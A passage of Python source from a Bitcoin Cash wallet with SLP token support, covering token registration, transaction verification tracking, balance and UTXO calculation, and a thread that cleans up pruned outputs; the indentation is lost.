argument which is an error message (suitable for display to the user).
On success (True) return, this method ends up calling
self.add_token_type(), and also will end up saving the changes to
wallet storage if write_storage=True (the default).
This function is thread-safe. '''
token_name = token_name.strip()
token_id = token_id.strip().lower()
# Check for duplication error
d = self.token_types.get(token_id)
group_id = d.get('group_id', None) if d else None
if d is not None and not allow_overwrite:
if error_callback:
error_callback(_('Token with this hash id already exists'))
return False
for tid, d in self.token_types.copy().items(): # <-- must take a snapshot-copy here since we aren't holding locks and other threads may modify this dict as we iterate
if d['name'] == token_name and tid != token_id:
token_name = token_name + "-" + token_id[:3]
break
#Hash id validation
gothex = self._add_token_hex_re.match(token_id)
if not gothex:
if error_callback:
error_callback(_('Invalid token_id hash'))
return False
#token name validation
# if len(token_name) < 1 or len(token_name) > 20:
# if error_callback:
# error_callback(_('Token name should be 1-20 characters'))
# return False
new_entry = {
'class' : token_class,
'name' : token_name,
'decimals' : decimals_divisibility,
}
if token_class == "SLP65":
if group_id is None:
new_entry['group_id'] = "?"
else:
new_entry['group_id'] = group_id
self.add_token_type(token_id, new_entry)
self.save_transactions(bool(write_storage))
return True
def add_token_from_genesis_tx(self, tx_or_raw, *, error_callback=None, allow_overwrite=True) -> SlpMessage:
''' Returns None on failure, optionally calling error_callback
with a translated UI-suitable error message. Returns a valid
SlpMessage object on success. In exceptional circumstances (garbage
inputs), may raise.
Note that unlike the other add_token_* functions, this version defaults
to allow_overwrite = True.'''
tx = tx_or_raw
if not isinstance(tx, Transaction):
tx = Transaction(tx)
def fail(msg):
if error_callback:
error_callback(msg)
return None
token_id = tx.txid()
try:
slpMsg = SlpMessage.parseSlpOutputScript(tx.outputs()[0][1])
except SlpUnsupportedSlpTokenType as e:
return fail(_("Unsupported SLP token version/type - %r.")%(e.args[0],))
except SlpInvalidOutputMessage as e:
return fail(_("This transaction does not contain a valid SLP message.\nReason: %r.")%(e.args,))
if slpMsg.transaction_type != 'GENESIS':
return fail(_("This is an SLP transaction, however it is not a genesis transaction."))
token_name = slpMsg.op_return_fields['ticker'].decode('utf-8') or slpMsg.op_return_fields['token_name'].decode('utf-8')
decimals = slpMsg.op_return_fields['decimals']
token_class = 'SLP%d' % (slpMsg.token_type,)
if self.add_token_safe(token_class, token_id, token_name, decimals, error_callback=fail, allow_overwrite=allow_overwrite):
return slpMsg
else:
return None
def save_verified_tx(self, write=False):
with self.lock:
self.storage.put('verified_tx3', self.verified_tx)
self.cashacct.save()
if write:
self.storage.write()
def clear_history(self):
with self.lock:
self.txi = {}
self.txo = {}
self.tx_fees = {}
self.pruned_txo = {}
self.pruned_txo_values = set()
self.save_transactions()
self._addr_bal_cache = {}
self._history = {}
self.tx_addr_hist = defaultdict(set)
self.cashacct.on_clear_history()
@profiler
def build_reverse_history(self):
self.tx_addr_hist = defaultdict(set)
for addr, hist in self._history.items():
for tx_hash, h in hist:
self.tx_addr_hist[tx_hash].add(addr)
@profiler
def check_history(self):
save = False
my_addrs = [addr for addr in self._history if self.is_mine(addr)]
for addr in set(self._history) - set(my_addrs):
self._history.pop(addr)
save = True
for addr in my_addrs:
hist = self._history[addr]
for tx_hash, tx_height in hist:
if tx_hash in self.pruned_txo_values or self.txi.get(tx_hash) or self.txo.get(tx_hash):
continue
tx = self.transactions.get(tx_hash)
if tx is not None:
self.add_transaction(tx_hash, tx)
save = True
if save:
self.save_transactions()
self.cashacct.save()
def basename(self):
return os.path.basename(self.storage.path)
def save_addresses(self):
addr_dict = {
'receiving': [addr.to_storage_string()
for addr in self.receiving_addresses],
'change': [addr.to_storage_string()
for addr in self.change_addresses],
}
self.storage.put('addresses', addr_dict)
def load_addresses(self):
d = self.storage.get('addresses', {})
if not isinstance(d, dict):
d = {}
self.receiving_addresses = Address.from_strings(d.get('receiving', []))
self.change_addresses = Address.from_strings(d.get('change', []))
def synchronize(self):
pass
def is_deterministic(self):
return self.keystore.is_deterministic()
def set_up_to_date(self, up_to_date):
with self.lock:
self.up_to_date = up_to_date
if up_to_date:
self.save_addresses()
self.save_transactions()
# if the verifier is also up to date, persist that too;
# otherwise it will persist its results when it finishes
if self.verifier and self.verifier.is_up_to_date():
self.save_verified_tx()
self.storage.write()
def is_up_to_date(self):
with self.lock: return self.up_to_date
def is_fully_settled_down(self):
''' Returns True iff the wallet is up to date and its synchronizer
and verifier aren't busy doing work, and its pruned_txo_values list
is currently empty. This is used as a final check by the Qt GUI
to decide if it should do a final refresh of all tabs in some cases.'''
with self.lock:
ret = self.up_to_date
if ret and self.verifier:
ret = self.verifier.is_up_to_date()
if ret and self.synchronizer:
ret = self.synchronizer.is_up_to_date()
ret = ret and not self.pruned_txo_values
return bool(ret)
def set_label(self, name, text=None, save=True):
with self.lock:
if isinstance(name, Address):
name = name.to_storage_string()
changed = False
old_text = self.labels.get(name)
if text:
text = text.replace("\n", " ")
if old_text != text:
self.labels[name] = text
changed = True
else:
if old_text:
self.labels.pop(name)
changed = True
if changed:
run_hook('set_label', self, name, text)
if save:
self.save_labels()
return changed
def save_labels(self):
self.storage.put('labels', self.labels)
def invalidate_address_set_cache(self):
"""This should be called from functions that add/remove addresses
from the wallet to ensure the address set caches are empty, in
particular from ImportedWallets which may add/delete addresses
thus the length check in is_mine() may not be accurate.
Deterministic wallets can neglect to call this function since their
address sets only grow and never shrink and thus the length check
of is_mine below is sufficient."""
self._recv_address_set_cached, self._change_address_set_cached = frozenset(), frozenset()
def is_mine(self, address):
"""Note this method assumes that the entire address set is
composed of self.get_change_addresses() + self.get_receiving_addresses().
In subclasses, if that is not the case -- REIMPLEMENT this method!"""
assert not isinstance(address, str)
# assumption here is get_receiving_addresses and get_change_addresses
# are cheap constant-time operations returning a list reference.
# If that is not the case -- reimplement this function.
ra, ca = self.get_receiving_addresses(), self.get_change_addresses()
# Detect if sets changed (addresses added/removed).
# Note the functions that add/remove addresses should invalidate this
# cache using invalidate_address_set_cache() above.
if len(ra) != len(self._recv_address_set_cached):
# re-create cache if lengths don't match
self._recv_address_set_cached = frozenset(ra)
if len(ca) != len(self._change_address_set_cached):
# re-create cache if lengths don't match
self._change_address_set_cached = frozenset(ca)
# Do a 2 x O(logN) lookup using sets rather than 2 x O(N) lookups
# if we were to use the address lists (this was the previous way).
# For small wallets it doesn't matter -- but for wallets with 5k or 10k
# addresses, it starts to add up siince is_mine() is called frequently
# especially while downloading address history.
return (address in self._recv_address_set_cached
or address in self._change_address_set_cached)
def is_change(self, address):
assert not isinstance(address, str)
ca = self.get_change_addresses()
if len(ca) != len(self._change_address_set_cached):
# re-create cache if lengths don't match
self._change_address_set_cached = frozenset(ca)
return address in self._change_address_set_cached
def get_address_index(self, address):
try:
return False, self.receiving_addresses.index(address)
except ValueError:
pass
try:
return True, self.change_addresses.index(address)
except ValueError:
pass
assert not isinstance(address, str)
raise Exception("Address {} not found".format(address))
def export_private_key(self, address, password):
""" extended WIF format """
if self.is_watching_only():
return []
index = self.get_address_index(address)
pk, compressed = self.keystore.get_private_key(index, password)
return bitcoin.serialize_privkey(pk, compressed, self.txin_type)
def get_public_keys(self, address):
sequence = self.get_address_index(address)
return self.get_pubkeys(*sequence)
def add_unverified_tx(self, tx_hash, tx_height):
with self.lock:
if tx_height == 0 and tx_hash in self.verified_tx:
self.verified_tx.pop(tx_hash)
if self.verifier:
self.verifier.merkle_roots.pop(tx_hash, None)
# tx will be verified only if height > 0
if tx_hash not in self.verified_tx:
self.unverified_tx[tx_hash] = tx_height
self.cashacct.add_unverified_tx_hook(tx_hash, tx_height)
def add_verified_tx(self, tx_hash, info, header):
# Remove from the unverified map and add to the verified map and
with self.lock:
self.unverified_tx.pop(tx_hash, None)
self.verified_tx[tx_hash] = info # (tx_height, timestamp, pos)
height, conf, timestamp = self.get_tx_height(tx_hash)
self.cashacct.add_verified_tx_hook(tx_hash, info, header)
self.network.trigger_callback('verified2', self, tx_hash, height, conf, timestamp)
def verification_failed(self, tx_hash, reason):
''' TODO: Notify gui of this if it keeps happening, try a different
server, rate-limited retries, etc '''
self.cashacct.verification_failed_hook(tx_hash, reason)
def get_unverified_txs(self):
'''Returns a map from tx hash to transaction height'''
with self.lock:
return self.unverified_tx.copy()
def get_unverified_tx_pending_count(self):
''' Returns the number of unverified tx's that are confirmed and are
still in process and should be verified soon.'''
with self.lock:
return len([1 for height in self.unverified_tx.values() if height > 0])
def undo_verifications(self, blockchain, height):
'''Used by the verifier when a reorg has happened'''
txs = set()
with self.lock:
for tx_hash, item in list(self.verified_tx.items()):
tx_height, timestamp, pos = item
if tx_height >= height:
header = blockchain.read_header(tx_height)
# fixme: use block hash, not timestamp
if not header or header.get('timestamp') != timestamp:
self.verified_tx.pop(tx_hash, None)
txs.add(tx_hash)
if txs: self.cashacct.undo_verifications_hook(txs)
if txs:
self._addr_bal_cache = {} # this is probably not necessary -- as the receive_history_callback will invalidate bad cache items -- but just to be paranoid we clear the whole balance cache on reorg anyway as a safety measure
return txs
def get_local_height(self):
""" return last known height if we are offline """
return self.network.get_local_height() if self.network else self.storage.get('stored_height', 0)
def get_tx_height(self, tx_hash):
""" return the height and timestamp of a verified transaction. """
with self.lock:
if tx_hash in self.verified_tx:
height, timestamp, pos = self.verified_tx[tx_hash]
conf = max(self.get_local_height() - height + 1, 0)
return height, conf, timestamp
elif tx_hash in self.unverified_tx:
height = self.unverified_tx[tx_hash]
return height, 0, 0
else:
return 0, 0, 0
def get_tx_block_hash(self, tx_hash):
''' Only works for tx's in wallet, for which we know the height. '''
height, ign, ign2 = self.get_tx_height(tx_hash)
return self.get_block_hash(height)
def get_block_hash(self, height):
'''Convenience method equivalent to Blockchain.get_height(), except our
version returns None instead of NULL_HASH_HEX on 'not found' header. '''
ret = None
if self.network and height is not None and height >= 0 and height <= self.get_local_height():
bchain = self.network.blockchain()
if bchain:
ret = bchain.get_hash(height)
if ret == NULL_HASH_HEX:
# if hash was NULL (all zeroes), prefer to return None
ret = None
return ret
def get_txpos(self, tx_hash):
"return position, even if the tx is unverified"
with self.lock:
if tx_hash in self.verified_tx:
height, timestamp, pos = self.verified_tx[tx_hash]
return height, pos
elif tx_hash in self.unverified_tx:
height = self.unverified_tx[tx_hash]
return (height, 0) if height > 0 else ((1e9 - height), 0)
else:
return (1e9+1, 0)
def is_found(self):
return any(value for value in self._history.values())
def get_num_tx(self, address):
""" return number of transactions where address is involved """
return len(self.get_address_history(address))
def get_tx_delta(self, tx_hash, address):
assert isinstance(address, Address)
"effect of tx on address"
# pruned
if tx_hash in self.pruned_txo_values:
return None
delta = 0
# substract the value of coins sent from address
d = self.txi.get(tx_hash, {}).get(address, [])
for n, v in d:
delta -= v
# add the value of the coins received at address
d = self.txo.get(tx_hash, {}).get(address, [])
for n, v, cb in d:
delta += v
return delta
WalletDelta = namedtuple("WalletDelta", "is_relevant, is_mine, v, fee")
WalletDelta2 = namedtuple("WalletDelta2", WalletDelta._fields + ("spends_coins_mine",))
def get_wallet_delta(self, tx) -> WalletDelta:
return self._get_wallet_delta(tx, ver=1)
def _get_wallet_delta(self, tx, *, ver=1) -> Union[WalletDelta, WalletDelta2]:
""" Effect of tx on wallet """
assert ver in (1, 2)
is_relevant = False
is_mine = False
is_pruned = False
is_partial = False
v_in = v_out = v_out_mine = 0
spends_coins_mine = list()
for item in tx.inputs():
addr = item['address']
if self.is_mine(addr):
is_mine = True
is_relevant = True
prevout_hash = item['prevout_hash']
prevout_n = item['prevout_n']
d = self.txo.get(prevout_hash, {}).get(addr, [])
for n, v, cb in d:
if n == prevout_n:
value = v
if ver == 2:
spends_coins_mine.append(f'{prevout_hash}:{prevout_n}')
break
else:
value = None
if value is None:
is_pruned = True
else:
v_in += value
else:
is_partial = True
if not is_mine:
is_partial = False
for _type, addr, value in tx.outputs():
v_out += value
if self.is_mine(addr):
v_out_mine += value
is_relevant = True
if is_pruned:
# some inputs are mine:
fee = None
if is_mine:
v = v_out_mine - v_out
else:
# no input is mine
v = v_out_mine
else:
v = v_out_mine - v_in
if is_partial:
# some inputs are mine, but not all
fee = None
else:
# all inputs are mine
fee = v_in - v_out
if not is_mine:
fee = None
if ver == 1:
return self.WalletDelta(is_relevant, is_mine, v, fee)
return self.WalletDelta2(is_relevant, is_mine, v, fee, spends_coins_mine)
TxInfo = namedtuple("TxInfo", "tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n")
class StatusEnum(Enum):
Unconfirmed = auto()
NotVerified = auto()
Confirmed = auto()
Signed = auto()
Unsigned = auto()
PartiallySigned = auto()
TxInfo2 = namedtuple("TxInfo2", TxInfo._fields + ("status_enum",))
def get_tx_info(self, tx) -> TxInfo:
""" Return information for a transaction """
return self._get_tx_info(tx, self.get_wallet_delta(tx), ver=1)
def get_tx_extended_info(self, tx) -> Tuple[WalletDelta2, TxInfo2]:
""" Get extended information for a transaction, combined into 1 call (for performance) """
delta2 = self._get_wallet_delta(tx, ver=2)
info2 = self._get_tx_info(tx, delta2, ver=2)
return (delta2, info2)
def _get_tx_info(self, tx, delta, *, ver=1) -> Union[TxInfo, TxInfo2]:
""" get_tx_info implementation """
assert ver in (1, 2)
if isinstance(delta, self.WalletDelta):
is_relevant, is_mine, v, fee = delta
else:
is_relevant, is_mine, v, fee, __ = delta
exp_n = None
can_broadcast = False
label = ''
height = conf = timestamp = None
status_enum = None
tx_hash = tx.txid()
if tx.is_complete():
if tx_hash in self.transactions:
label = self.get_label(tx_hash)
height, conf, timestamp = self.get_tx_height(tx_hash)
if height > 0:
if conf:
status = ngettext("{conf} confirmation", "{conf} confirmations", conf).format(conf=conf)
status_enum = self.StatusEnum.Confirmed
else:
status = _('Not verified')
status_enum = self.StatusEnum.NotVerified
else:
status = _('Unconfirmed')
status_enum = self.StatusEnum.Unconfirmed
if fee is None:
fee = self.tx_fees.get(tx_hash)
if fee and self.network and self.network.config.has_fee_estimates():
# NB: this branch will not be taken as has_fee_estimates()
# will always return false since we disabled querying
# the fee histogram as it's useless for BCH anyway.
size = tx.estimated_size()
fee_per_kb = fee * 1000 / size
exp_n = self.network.config.reverse_dynfee(fee_per_kb)
else:
status = _("Signed")
status_enum = self.StatusEnum.Signed
can_broadcast = self.network is not None
else:
s, r = tx.signature_count()
if s == 0:
status = _("Unsigned")
status_enum = self.StatusEnum.Unsigned
else:
status =_('Partially signed') + ' (%d/%d)'%(s,r)
status_enum = self.StatusEnum.PartiallySigned
if is_relevant:
if is_mine:
if fee is not None:
amount = v + fee
else:
amount = v
else:
amount = v
else:
amount = None
if ver == 1:
return self.TxInfo(tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n)
assert status_enum is not None
return self.TxInfo2(tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n,
status_enum)
def get_addr_io(self, address):
h = self.get_address_history(address)
received = {}
sent = {}
for tx_hash, height in h:
l = self.txo.get(tx_hash, {}).get(address, [])
for n, v, is_cb in l:
received[tx_hash + ':%d'%n] = (height, v, is_cb)
for tx_hash, height in h:
l = self.txi.get(tx_hash, {}).get(address, [])
for txi, v in l:
sent[txi] = height
return received, sent
def get_slp_token_info(self, tokenid):
with self.lock:
return self.tx_tokinfo[tokenid]
def get_slp_token_baton(self, slpTokenId, cache=True):
with self.lock:
slp_txos = copy.deepcopy(self._slp_txo)
# look for a minting baton
for addr, addrdict in slp_txos.items():
for txid, txdict in addrdict.items():
for idx, txo in txdict.items():
if txo['qty'] == 'MINT_BATON' and txo['token_id'] == slpTokenId:
try:
coins = self.get_slp_utxos(slpTokenId, domain = [addr], exclude_frozen = False, confirmed_only = False, slp_include_baton=True)
with self.lock:
val = self.tx_tokinfo[txid]['validity']
baton_utxo = [ utxo for utxo in coins if utxo['prevout_hash'] == txid and utxo['prevout_n'] == idx and val == 1][0]
except IndexError:
continue
return baton_utxo
raise SlpNoMintingBatonFound()
# This method is updated for SLP to prevent tokens from being spent
# in normal txn or txns with token_id other than the one specified
def get_addr_utxo(self, address, *, exclude_slp = True):
coins, spent = self.get_addr_io(address)
# removes spent coins
for txi in spent:
coins.pop(txi)
# cleanup/detect if the 'frozen coin' was spent and remove it from the frozen coin set
self.frozen_coins.discard(txi)
self.frozen_coins_tmp.discard(txi)
"""
SLP -- removes ALL SLP UTXOs that are either unrelated, or unvalidated
"""
if exclude_slp:
with self.lock:
addrdict = self._slp_txo.get(address,{})
for txid, txdict in addrdict.items():
for idx, txo in txdict.items():
coins.pop(txid + ":" + str(idx), None)
out = {}
for txo, v in coins.items():
tx_height, value, is_cb = v
prevout_hash, prevout_n = txo.split(':')
x = {
'address':address,
'value':value,
'prevout_n':int(prevout_n),
'prevout_hash':prevout_hash,
'height':tx_height,
'coinbase':is_cb,
'is_frozen_coin': txo in self.frozen_coins or txo in self.frozen_coins_tmp
}
out[txo] = x
return out
""" SLP -- keeps ONLY SLP UTXOs that are either unrelated, or unvalidated """
def get_slp_addr_utxo(self, address, slpTokenId, slp_include_invalid=False, slp_include_baton=False, ):
with self.lock:
coins, spent = self.get_addr_io(address)
addrdict = copy.deepcopy(self._slp_txo.get(address,{}))
# removes spent coins
for txi in spent:
coins.pop(txi)
# cleanup/detect if the 'frozen coin' was spent and remove it from the frozen coin set
self.frozen_coins.discard(txi)
self.frozen_coins_tmp.discard(txi)
coins_to_pop = []
for coin in coins.items():
if coin != None:
txid = coin[0].split(":")[0]
idx = coin[0].split(":")[1]
try:
slp_txo = addrdict[txid][int(idx)]
with self.lock:
slp_tx_info = self.tx_tokinfo[txid]
# handle special burning modes
if slp_txo['token_id'] == slpTokenId:
# allow inclusion and possible burning of a valid minting baton
if slp_include_baton and slp_txo['qty'] == "MINT_BATON" and slp_tx_info['validity'] == 1:
continue
# allow inclusion and possible burning of invalid SLP txos
if slp_include_invalid and slp_tx_info['validity'] != 0:
continue
# normal remove any txos that are not valid for this token ID
if slp_txo['token_id'] != slpTokenId or slp_tx_info['validity'] != 1 or slp_txo['qty'] == "MINT_BATON":
coins_to_pop.append(coin[0])
except KeyError:
coins_to_pop.append(coin[0])
for c in coins_to_pop:
coins.pop(c, None)
out = {}
for txo, v in coins.items():
tx_height, value, is_cb = v
prevout_hash, prevout_n = txo.split(':')
with self.lock:
tok_info = self.tx_tokinfo[prevout_hash]
x = {
'address': address,
'value': value,
'prevout_n': int(prevout_n),
'prevout_hash': prevout_hash,
'height': tx_height,
'coinbase': is_cb,
'is_frozen_coin': txo in self.frozen_coins or txo in self.frozen_coins_tmp,
'token_value': addrdict[prevout_hash][int(prevout_n)]['qty'],
'token_id_hex': tok_info['token_id'],
'token_type': tok_info['type'],
'token_validation_state': tok_info['validity']
}
out[txo] = x
return out
# return the total amount ever received by an address
def get_addr_received(self, address):
received, sent = self.get_addr_io(address)
return sum([v for height, v, is_cb in received.values()])
def get_addr_balance(self, address, exclude_frozen_coins=False):
''' Returns the balance of a bitcoin address as a tuple of:
(confirmed_matured, unconfirmed, unmatured)
Note that 'exclude_frozen_coins = True' only checks for coin-level
freezing, not address-level. '''
assert isinstance(address, Address)
mempoolHeight = self.get_local_height() + 1
if not exclude_frozen_coins: # we do not use the cache when excluding frozen coins as frozen status is a dynamic quantity that can change at any time in the UI
cached = self._addr_bal_cache.get(address)
if cached is not None:
return cached
received, sent = self.get_addr_io(address)
c = u = x = 0
had_cb = False
for txo, (tx_height, v, is_cb) in received.items():
if exclude_frozen_coins and (txo in self.frozen_coins or txo in self.frozen_coins_tmp):
continue
had_cb = had_cb or is_cb # remember if this address has ever seen a coinbase txo
if is_cb and tx_height + COINBASE_MATURITY > mempoolHeight:
x += v
elif tx_height > 0:
c += v
else:
u += v
if txo in sent:
if sent[txo] > 0:
c -= v
else:
u -= v
result = c, u, x
if not exclude_frozen_coins and not had_cb:
# Cache the results.
# Cache needs to be invalidated if a transaction is added to/
# removed from addr history. (See self._addr_bal_cache calls
# related to this littered throughout this file).
#
# Note that as a performance tweak we don't ever cache balances for
# addresses involving coinbase coins. The rationale being as
# follows: Caching of balances of the coinbase addresses involves
# a dynamic quantity: maturity of the coin (which considers the
# ever-changing block height).
#
# There wasn't a good place in this codebase to signal the maturity
# happening (and thus invalidate the cache entry for the exact
# address that holds the coinbase coin in question when a new
# block is found that matures a coinbase coin).
#
# In light of that fact, a possible approach would be to invalidate
# this entire cache when a new block arrives (this is what Electrum
# does). However, for Electron Cash with its focus on many addresses
# for future privacy features such as integrated CashShuffle --
# being notified in the wallet and invalidating the *entire* cache
# whenever a new block arrives (which is the exact time you do
# the most GUI refreshing and calling of this function) seems a bit
# heavy-handed, just for sake of the (relatively rare, for the
# average user) coinbase-carrying addresses.
#
# It's not a huge performance hit for the coinbase addresses to
# simply not cache their results, and have this function recompute
# their balance on each call, when you consider that as a
# consequence of this policy, all the other addresses that are
# non-coinbase can benefit from a cache that stays valid for longer
# than 1 block (so long as their balances haven't changed).
self._addr_bal_cache[address] = result
return result
def get_spendable_coins(self, domain, config, isInvoice = False):
confirmed_only = config.get('confirmed_only', DEFAULT_CONFIRMED_ONLY)
# if (isInvoice):
# confirmed_only = True
return self.get_utxos(domain=domain, exclude_frozen=True, mature=True, confirmed_only=confirmed_only)
def get_slp_spendable_coins(self, slpTokenId, domain, config, isInvoice = False):
confirmed_only = config.get('confirmed_only', False)
# if (isInvoice):
# confirmed_only = True
return self.get_slp_utxos(slpTokenId, domain=domain, exclude_frozen=True, confirmed_only=confirmed_only)
def get_slp_coins(self, slpTokenId, domain, config, isInvoice = False):
confirmed_only = config.get('confirmed_only', False)
# if (isInvoice):
# confirmed_only = True
return self.get_slp_utxos(slpTokenId, domain=domain, exclude_frozen=False, confirmed_only=confirmed_only)
def get_slp_token_balance(self, slpTokenId, config):
valid_token_bal = 0
unvalidated_token_bal = 0
invalid_token_bal = 0
unfrozen_valid_token_bal = 0
slp_coins = self.get_slp_coins(slpTokenId, None, config)
for coin in slp_coins:
txid = coin['prevout_hash']
validity = self.tx_tokinfo[txid]['validity']
if validity == 1: # Valid DAG
valid_token_bal += coin['token_value']
if not coin['is_frozen_coin'] and coin['address'] not in self.frozen_addresses:
unfrozen_valid_token_bal += coin['token_value']
elif validity > 1: # Invalid DAG (2=bad slpmessage, 3=inputs lack enough tokens / missing mint baton, 4=change token_type or bad NFT parent)
invalid_token_bal += coin['token_value']
elif validity == 0: # Unknown DAG status (should be in processing queue)
unvalidated_token_bal += coin['token_value']
return (valid_token_bal, unvalidated_token_bal, invalid_token_bal, unfrozen_valid_token_bal, valid_token_bal - unfrozen_valid_token_bal)
def get_utxos(self, domain = None, exclude_frozen = False, mature = False, confirmed_only = False,
*, addr_set_out = None, exclude_slp = True):
'''Note that exclude_frozen = True checks for BOTH address-level and
coin-level frozen status.
Optional kw-only arg `addr_set_out` specifies a set in which to add all
addresses encountered in the utxos returned. '''
with self.lock:
mempoolHeight = self.get_local_height() + 1
coins = []
if domain is None:
domain = self.get_addresses()
if exclude_frozen:
domain = set(domain) - self.frozen_addresses
for addr in domain:
utxos = self.get_addr_utxo(addr, exclude_slp=exclude_slp)
len_before = len(coins)
for x in utxos.values():
if exclude_frozen and x['is_frozen_coin']:
continue
if confirmed_only and x['height'] <= 0:
continue
# A note about maturity: Previous versions of Electrum
# and Electron Cash were off by one. Maturity is
# calculated based off mempool height (chain tip height + 1).
# See bitcoind consensus/tx_verify.cpp Consensus::CheckTxInputs
# and also txmempool.cpp CTxMemPool::removeForReorg.
if mature and x['coinbase'] and mempoolHeight - x['height'] < COINBASE_MATURITY:
continue
coins.append(x)
if addr_set_out is not None and len(coins) > len_before:
# add this address to the address set if it has results
addr_set_out.add(addr)
return coins
def get_slp_utxos(self, slpTokenId, domain = None, exclude_frozen = False, confirmed_only = False, slp_include_invalid=False, slp_include_baton=False,
*, addr_set_out = None):
'''Note that exclude_frozen = True checks for BOTH address-level and
coin-level frozen status.
Optional kw-only arg `addr_set_out` specifies a set in which to add all
addresses encountered in the utxos returned. '''
with self.lock:
coins = []
if domain is None:
domain = self.get_addresses()
if exclude_frozen:
domain = set(domain) - self.frozen_addresses
for addr in domain:
utxos = self.get_slp_addr_utxo(addr, slpTokenId, slp_include_invalid=slp_include_invalid, slp_include_baton=slp_include_baton)
len_before = len(coins)
for x in utxos.values():
if exclude_frozen and x['is_frozen_coin']:
continue
if confirmed_only and x['height'] <= 0:
continue
coins.append(x)
continue
if addr_set_out is not None and len(coins) > len_before:
# add this address to the address set if it has results
addr_set_out.add(addr)
return coins
def dummy_address(self):
return self.get_receiving_addresses()[0]
def get_addresses(self):
return self.get_receiving_addresses() + self.get_change_addresses()
def get_frozen_balance(self):
if not self.frozen_coins and not self.frozen_coins_tmp:
# performance short-cut -- get the balance of the frozen address set only IFF we don't have any frozen coins
return self.get_balance(self.frozen_addresses)
# otherwise, do this more costly calculation...
cc_no_f, uu_no_f, xx_no_f = self.get_balance(None, exclude_frozen_coins = True, exclude_frozen_addresses = True)
cc_all, uu_all, xx_all = self.get_balance(None, exclude_frozen_coins = False, exclude_frozen_addresses = False)
return (cc_all-cc_no_f), (uu_all-uu_no_f), (xx_all-xx_no_f)
def get_slp_locked_balance(self):
bch = 0
with self.lock:
for addr, addrdict in self._slp_txo.items():
_, spent = self.get_addr_io(addr)
for txid, txdict in addrdict.items():
for idx, txo in txdict.items():
if (txid + ":" + str(idx)) in spent:
continue
try:
for i, a, _ in self.txo[txid][addr]:
if i == idx:
bch+=a
except KeyError:
pass
return bch
def get_balance(self, domain=None, exclude_frozen_coins=False, exclude_frozen_addresses=False):
if domain is None:
domain = self.get_addresses()
if exclude_frozen_addresses:
domain = set(domain) - self.frozen_addresses
cc = uu = xx = 0
for addr in domain:
c, u, x = self.get_addr_balance(addr, exclude_frozen_coins)
cc += c
uu += u
xx += x
return cc, uu, xx
def get_address_history(self, address):
assert isinstance(address, Address)
return self._history.get(address, [])
def _clean_pruned_txo_thread(self):
''' Runs in the thread self.pruned_txo_cleaner_thread which is only
active if self.network. Cleans the self.pruned_txo dict and the
self.pruned_txo_values set of spends that are not relevant to the
wallet. The processing below is needed because as of 9/16/2019, Electron
Cash temporarily puts all spends that pass through add_transaction and
have an unparseable address (txi['address'] is None) into the dict
self.pruned_txo. This is necessary for handling tx's with esoteric p2sh
scriptSigs and detecting balance changes properly for txins
containing such scriptSigs. See #895. '''
def deser(ser):
prevout_hash, prevout_n = ser.split(':')
prevout_n = int(prevout_n)
return prevout_hash, prevout_n
def mkser(prevout_hash, prevout_n):
return f'{prevout_hash}:{prevout_n}'
def rm(ser, pruned_too=True, *, tup = None):
h, n = tup or deser(ser) # tup arg is for performance when caller already knows the info (avoid a redundant .split on ':')
s = txid_n[h]
s.discard(n)
if not s:
txid_n.pop(h, None)
if pruned_too:
with self.lock:
tx_hash = self.pruned_txo.pop(ser, None)
self.pruned_txo_values.discard(tx_hash)
def add(ser):
prevout_hash, prevout_n = deser(ser)
txid_n[prevout_hash].add(prevout_n)
def keep_running():
return bool(self.network and self.pruned_txo_cleaner_thread is me)
def can_do_work():
return bool(txid_n and self.is_up_to_date())
debug = False # set this to true here to get more verbose output
me = threading.current_thread()
q = me.q
me.txid_n = txid_n = defaultdict(set) # dict of prevout_hash -> set of prevout_n (int)
last = time.time()
try:
self.print_error(f"{me.name}: thread started")
with self.lock:
# Setup -- grab whatever was already in pruned_txo at thread
# start
for ser in self.pruned_txo:
h, n = deser(ser)
txid_n[h].add(n)
while keep_running():
try:
ser = q.get(timeout=5.0 if can_do_work() else 20.0)
if ser is None:
# quit thread
return
if ser.startswith('r_'):
# remove requested
rm(ser[2:], False)
else:
# ser was added
add(ser)
del ser
except queue.Empty:
pass
if not can_do_work():
continue
t0 = time.time()
if t0 - last < 1.0: # run no more often than once per second
continue
last = t0
defunct_ct = 0
for prevout_hash, s in txid_n.copy().items():
for prevout_n in s.copy():
ser = mkser(prevout_hash, prevout_n)
with self.lock:
defunct = ser not in self.pruned_txo
if defunct:
#self.print_error(f"{me.name}: skipping already-cleaned", ser)
rm(ser, False, tup=(prevout_hash, prevout_n))
defunct_ct += 1
continue
if defunct_ct and debug:
self.print_error(f"{me.name}: DEBUG", defunct_ct, "defunct txos removed in", time.time()-t0, "secs")
ct = 0
for prevout_hash, s in txid_n.copy().items():
try:
with self.lock:
tx = self.transactions.get(prevout_hash)
if tx is None:
tx = Transaction.tx_cache_get(prevout_hash)
if isinstance(tx, Transaction):
tx = Transaction(tx.raw) # take a copy
else:
if debug: self.print_error(f"{me.name}: DEBUG retrieving txid", prevout_hash, "...")
t1 = time.time()
tx = Transaction(self.network.synchronous_get(('blockchain.transaction.get', [prevout_hash])))
if debug: self.print_error(f"{me.name}: DEBUG network retrieve took", time.time()-t1, "secs")
# Paranoia; intended side effect of the below assert
# is to also deserialize the tx (by calling the slow
# .txid()) which ensures the tx from the server
# is not junk.
assert prevout_hash == tx.txid(), "txid mismatch"
Transaction.tx_cache_put(tx, prevout_hash) # will cache a copy
except Exception as e:
self.print_error(f"{me.name}: Error retrieving txid", prevout_hash, ":", repr(e))
if not keep_running(): # in case we got a network timeout *and* the wallet was closed
return
continue
if not keep_running():
return
for prevout_n in s.copy():
ser = mkser(prevout_hash, prevout_n)
try:
txo = tx.outputs()[prevout_n]
except IndexError:
self.print_error(f"{me.name}: ERROR -- could not find output", ser)
rm(ser, True, tup=(prevout_hash, prevout_n))
continue
_typ, addr, v = txo
rm_pruned_too = False
with self.lock:
mine = self.is_mine(addr)
if not mine and ser in self.pruned_txo:
ct += 1
rm_pruned_too = True
rm(ser, rm_pruned_too, tup=(prevout_hash, prevout_n))
if rm_pruned_too and debug:
self.print_error(f"{me.name}: DEBUG removed", ser)
if ct:
with self.lock:
# Save changes to storage -- this is cheap and doesn't
# actually write to file yet, just flags storage as
# 'dirty' for when wallet.storage.write() is called
# later.
self.storage.put('pruned_txo', self.pruned_txo)
